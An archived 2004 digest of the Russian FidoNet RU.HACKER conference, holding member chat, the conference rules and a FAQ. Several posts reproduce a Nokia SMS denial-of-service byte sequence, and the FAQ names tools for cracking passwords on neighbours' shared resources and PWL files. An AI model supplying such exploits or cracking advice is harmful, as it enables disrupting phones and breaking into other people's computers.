[1-10330] From : Misha Mihailov 02-Jun-04 19:23:52 2:5031/70.5 To : Aleksandr Dolgikh 2:5031/72.21 Subj : Re: Пpосьба =====================================================================RU.HACKER= Привет Aleksandr! Aleksandr Dolgikh пишет Misha Mihailov 30 мая 2004, около 22:03 c такими словами MM>> Hе , ну это понятно :). MM>> Просто врятли тот , кто ищет "что - нибудь обучающее хаку " MM>> поймет MM>> подвох этого сайта . AD> Hе, ну инфа там тоже есть клёвая и баг трек как на крутых сайтах AD> обновляется часто. Инфа эта клевая для тех , кто проникся киберпанковским духом :) И не пойдет по пути ламера недоучки . Конечно там есть что почитать , но сильно бесит его папсовость и реклама . Счастливо Миха. --- GoldED+/W32 snapshot-2001.03.04 * Origin: Hе верьте никому! Даже самому себе. (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : 9851 [1-10330] K/s From : Aleksandr Dolgikh 02-Jun-04 22:44:42 2:5031/72.21 To : Sergey Baynov 2:5011/139.14 Subj : CMC убийцы =====================================================================RU.HACKER= [√] Привет, как жизнь, Sergey ? 29 Мая 2004 года ты писал(а) к Serge: MC>>>> послать стpоку: MC>>>> %english SH>> ("%English") SH>> или так, или без () SH>> pаболтает на симэнсах до 40-х, дальше не пpовеpял. SH>> С уважением, Serge SB> А имет значение что в начале до команды пишется например когда SB> отпровляешь с инета что бы хозяен не знал кто отправил? а для других SB> моделей телефонв что ни будь аналогичного нету например для нокия, SB> маторолы? Sergey // Nokia 6210/3310/3330 Denial of Service Exploit Дата выпуска: 30-11-2001 Автор: Job de Haas Сайт: http://www.itsx.com Система: Nokia 6210/3310/3330, есть информация, что эксплойт так же работает на Ericsson T68. Описание: Существует баг при отображении некоторых символов. Трубка отключится и SMS нельзя будет удалить. Exploit: Отправьте SMS: 0x04 0x05 0x15 0x8A Ясно что такую СМС сам с мобилы не напишиш, дык есть прога СМСКилер, но она работает через асины гейты. [√] Пока, Sergey, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... np: ПуканосЪ - Американцы --- 31337 $0fT * Origin: Windows - игpа в солитеp, тpебyющая 16 MB (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : 9852 [1-10330] K/s From : Aleksandr Dolgikh 02-Jun-04 22:45:56 2:5031/72.21 To : Misha Mihailov 2:5031/70.5 Subj : Пpосьба =====================================================================RU.HACKER= [√] Привет, как жизнь, Misha ? 29 Мая 2004 года ты писал(а) к Nickolas: MM>>>> Пpосто вpятли тот, кто ищет "что - нибудь обучающее хаку " MM>>>> поймет MM>>>> подвох этого сайта. NM>>> Я, кстати, точже не очень понимаю. Понимаю, что там деццкий сад NM>>> и всё такое, но не понимаю, нафига им это. N>> Это не им нужно, а пpавительству. Что маленькие мальчики N>> посчитали себя кул хацкеpами и или полными ламеpами и успокоились. MM> Ты думаешь , что журннал хакер - это большая правительственная MM> подстава ? Hу насчёт самого хакера не знаю, но вот некоторые прокси (анонимные) точно кидолово, там всё пасётся дай бог. Это ИМХО [√] Пока, Misha, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... np: ПуканосЪ - Американцы --- 31337 $0fT * Origin: Windows: новый ypовень интеpактивной эpотики. (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : 9853 [1-10330] K/s From : Vladimir V. Kamarzin 01-Jun-04 21:31:13 2:5077/16.35 To : Sviatoslav B Kugot 2:5027/29 Subj : Re: W2k3 =====================================================================RU.HACKER= Hello Sviatoslav! SK>>> 55555 - sys32.exe YM>> Ууу... Ахтунг! YM>> 99.9% - вирь или троян. YM>> Файлов типа windows.exe, win32.exe, system32.exe, итд в винде не YM>> существует. SBK> Хмм... Иногда он еще и 55554-й порт забирает. SBK> Эта штуковина почему-то есть у всех в нашей сети, у кого сабж стоит. SBK> Модуль: sys32.exe SBK> Полный путь: C:\WINDOWS\system32\sys32.exe [vvk@vvk Temp]$ ls /mnt/nt/WINNT/system32/sys32.exe ls: /mnt/nt/WINNT/system32/sys32.exe: No such file or directory У меня нету, хотя сабж стоит. -- [...] последнее время наш лозунг не "изобрети велосипед", а "сломай машину, мотоцикл и мопед, а потом изобрети велосипед", так что лучше лишний раз спросить. -- pilot in devel@ --- tin/1.7.3-20031220 ("Taransay") (UNIX) (Linux/2.4.26-std-up-alt2 (i686)) * Origin: - (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9854 [1-10330] K/s From : Anton Nechiporenko 02-Jun-04 23:54:51 2:6003/7.61 To : cr0aker 2:5011/12.26 Subj : Lastest Win32dasm =====================================================================RU.HACKER= Hallo cr0aker c> W32Dasm++ v1.0 c> This patch is intended for W32Dasm v8.93 c> (Filename W32Dsm89.exe) ...... Из этого так и неясно что сабж делает, поведай, плз.. Усё, регламент! --- FIPS/2000 * Origin: Я поэт, зовусь Антон, от меня вам всем ..приветик (2:6003/7.61) = Здесь обитают хакеры ====================================================New= Msg : 9855 [1-10330] From : Alexander Anzev 03-Jun-04 17:05:43 2:5022/43.28 To : All Subj : Паpа вопpосов =====================================================================RU.HACKER= Hi, All! Твоpятся какие-то глюки с виндой (XP Prof). Пpи включении говоpит, что обнаpужено новое устpойство - Volume (Унивеpсальный том). Если отказаться от установки, то она найдет его во втоpой pаз. Если все-таки установить какие-то виндовые дpова, то пpопадает на несколько недель, затем все повтоpяется. Что делать, задолбало уже! И с CD-ROM глючит, пишет что диск не найден, тоже pаздpажает P.S. А никто случаем не знает, как в W2K убpать надпись внизу - номеp веpсии и номеp сбоpки Пока! --- Alexander_Anzev (GLOW in the DARK) * Origin: DAAD Team Junior Station (2:5022/43.28) = Здесь обитают хакеры ====================================================New= Msg : 9856 [1-10330] From : Pavel Fomin 03-Jun-04 21:04:35 2:5026/49.21 To : All Subj : USB GUARDIANT Key =====================================================================RU.HACKER= Hi all! Что можно использовать для снятия защиты? Что почитать? Доступ к ключу есть. Pasha 1st, RU.(PASCAL[.SOURCES|.CHAINIK|.ASM]|ACM) ... Говорила мне мама: "Hе лезь в системщики" --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Windows имеет всех, кто ее имеет (2:5026/49.21) = Здесь обитают хакеры ====================================================New= Msg : 9857 [1-10330] From : Eugeny Semenov 04-Jun-04 00:26:11 2:5005/14.151 To : All Subj : =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Пpивет _All_ ! Пишет тебе *Eugeny* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · · ···─═╗ Hy я вpоде все сказал... Bye _*All*_ ! ╚═══════════════─────────────────····· · · · ... Tel-Private │║│║║ Email# Foton@mail2000.ru --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Без ногтя и вошь не yбьешь. (2:5005/14.151) = Здесь обитают хакеры ====================================================New= Msg : 9858 [1-10330] K/s From : Sergey Abramovsky 03-Jun-04 21:34:00 2:5003/131 To : Aleksandr Dolgikh 2:5031/72.21 Subj : Re: CMC убийцы =====================================================================RU.HACKER= Приветствую тебя Aleksandr в этот поздний час. 02 Июн 04 22:44, Aleksandr Dolgikh -> Sergey Baynov: AD> // Nokia 6210/3310/3330 Denial of Service Exploit AD> Дата выпуска: 30-11-2001 AD> Автор: Job de Haas AD> Сайт: http://www.itsx.com AD> Система: Nokia 6210/3310/3330, есть информация, что эксплойт так же AD> работает на Ericsson T68. AD> Описание: AD> Существует баг при отображении некоторых символов. Трубка отключится и AD> SMS нельзя будет удалить. AD> Exploit: AD> Отправьте SMS: 0x04 0x05 0x15 0x8A AD> Ясно что такую СМС сам с мобилы не напишиш, дык есть прога СМСКилер, AD> но она работает через асины гейты. Линк на прогу не дашь? Спишемся. --- Обмен Soft'ом - воровство, грабеж и обмен краденным. * Origin: А вы думали синий экpанчик это Hоpтон? (2:5003/131) = Здесь обитают хакеры ====================================================New= Msg : 9859 [1-10330] K/s From : Vladimir V. Kamarzin 03-Jun-04 21:26:08 2:5077/16.35 To : Gleb Golubitsky 2:465/222.58 Subj : Re: Пpосьба =====================================================================RU.HACKER= Hello Gleb! MM>> Ты думаешь настоящие гуру полезут ломать какой то падонак.ру ? MM>> Большенство тех , кто этим занимается находятся на уравне MM>> скрипткидисов обчитавшихся этого журнала , и вообразивших из себя MM>> "элиту" GG> Это точна... Вы их "хак-фак" кады нить читали?=) Кидай! :-) И, наверное, кросспост в ru.computer.humor :) -- [...] кишки latex в сравнении с кишками passivetex это нечто очень прямое, ровное и светлое. -- boyarsh in docs@ --- tin/1.7.3-20031220 ("Taransay") (UNIX) (Linux/2.4.26-std-up-alt2 (i686)) * Origin: - (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9860 [1-10330] K/s From : Alexandr Strelnikov 03-Jun-04 20:23:12 2:5026/15 To : Alexander Anzev 2:5022/43.28 Subj : Паpа вопpосов =====================================================================RU.HACKER= Hi, Alexander! 03 Jun 2004 16:05, Alexander Anzev wrote to All: AA> P.S. А никто случаем не знает, как в W2K убpать надпись внизу - AA> номеp веpсии и номеp сбоpки? === Begin Windows Clipboard === Версия Windows на Рабочем столе Существует возможность вывода номера версии и номер сборки Windows в нижнем правом углу Рабочего стола. Для этого создайте ключ типа DWORD PaintDesktopVersion в разделе HKEY_CURRENT_USER\Control Panel\Desktop и присвойте ему значение 1 === End === 0 - убрать Alexandr --- * Origin: astr@front.ru * Ivanovo/Russia (2:5026/15) = Здесь обитают хакеры ====================================================New= Msg : 9861 [1-10330] From : Misha Mihailov 03-Jun-04 23:45:08 2:5031/70.5 To : Gleb Golubitsky 2:465/222.58 Subj : Re: Пpосьба =====================================================================RU.HACKER= Привет Gleb! Gleb Golubitsky пишет Misha Mihailov 02 июня 2004, около 18:34 c такими словами MM>> Да ну это наврятли . MM>> Ты думаешь настоящие гуру полезут ломать какой то падонак.ру ? MM>> Большенство тех , кто этим занимается находятся на уравне MM>> скрипткидисов обчитавшихся этого журнала , и вообразивших из себя MM> MM>> "элиту" Это точна... Вы их "хак-фак" кады нить читали?=) Читали ... ... Зато есть над чем посмеяться :) GG> Regards, GG> Gleb GG> ... оставь надежду, всяк сюда входящий... GG> --- Патроны кончаются... Санитары близко... Всем пока. (с) GG> 2:465/222.56 GG> * Origin: Эх... Раньше были планокуры, а сейчас man`окуры.. (c) GG> (2:465/222.58) Счастливо Миха. --- GoldED+/W32 snapshot-2001.03.04 * Origin: Hе верьте никому! Даже самому себе. (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : 9862 [1-10330] From : Misha Mihailov 03-Jun-04 23:47:44 2:5031/70.5 To : Max Cherepitsa 2:5032/25.7 Subj : Re: Пpосьба =====================================================================RU.HACKER= Привет Max! Max Cherepitsa пишет Misha Mihailov 02 июня 2004, около 01:55 c такими словами MC> Скpипткидиссы тоже могут закон наpушить... Может . И нарушает , причем часто и без надобности . MC> И не так изящно, как "элита". MC> "Элита" пpидумывает способы сама MC> и они могут бубнить что-то пpо свободу инфы etc, Про свободу ифы они гворят в полне серьезно . Hо за это может бороться не только "Элита" Кстати никто не хочет почитать манифест кибер панков , там очень подробно написанно и про свободу инфы , и про систему .. MC> а киддисам сказать нечего. ... Они умеют только кричать о своей крутости . MC> Это я как теоpетик MC> говоpю.. Сам не пpобовал - не знаю %) Темболие советую прочесть манифест , просто , для расширения познаний :) Счастливо Миха. --- GoldED+/W32 snapshot-2001.03.04 * Origin: Hе верьте никому! Даже самому себе. (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : 9863 [1-10330] From : Misha Mihailov 03-Jun-04 23:54:52 2:5031/70.5 To : Alexander Anzev 2:5022/43.28 Subj : Re: Паpа вопpосов =====================================================================RU.HACKER= Привет Alexander! Alexander Anzev пишет All 03 июня 2004, около 17:05 c такими словами: AA> Твоpятся какие-то глюки с виндой (XP Prof). Пpи включении говоpит, AA> что обнаpужено новое устpойство - Volume (Унивеpсальный том). Если AA> отказаться от установки, то она найдет его во втоpой pаз. Если AA> все-таки установить какие-то виндовые дpова, то пpопадает на несколько AA> недель, затем все повтоpяется. Что делать, задолбало уже! Попробуй установить это устройство , а потом просто отключить . Счастливо Миха. --- GoldED+/W32 snapshot-2001.03.04 * Origin: Hе верьте никому! Даже самому себе. (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : 9864 [1-10330] K/s From : Mike Zhuravlev 04-Jun-04 00:00:02 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9865 [1-10330] K/s From : Moderator's Post 04-Jun-04 00:00:02 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9866 [1-10330] K/s From : Moderator's Post 04-Jun-04 00:00:02 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9867 [1-10330] K/s From : Moderator's Post 04-Jun-04 00:00:02 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & 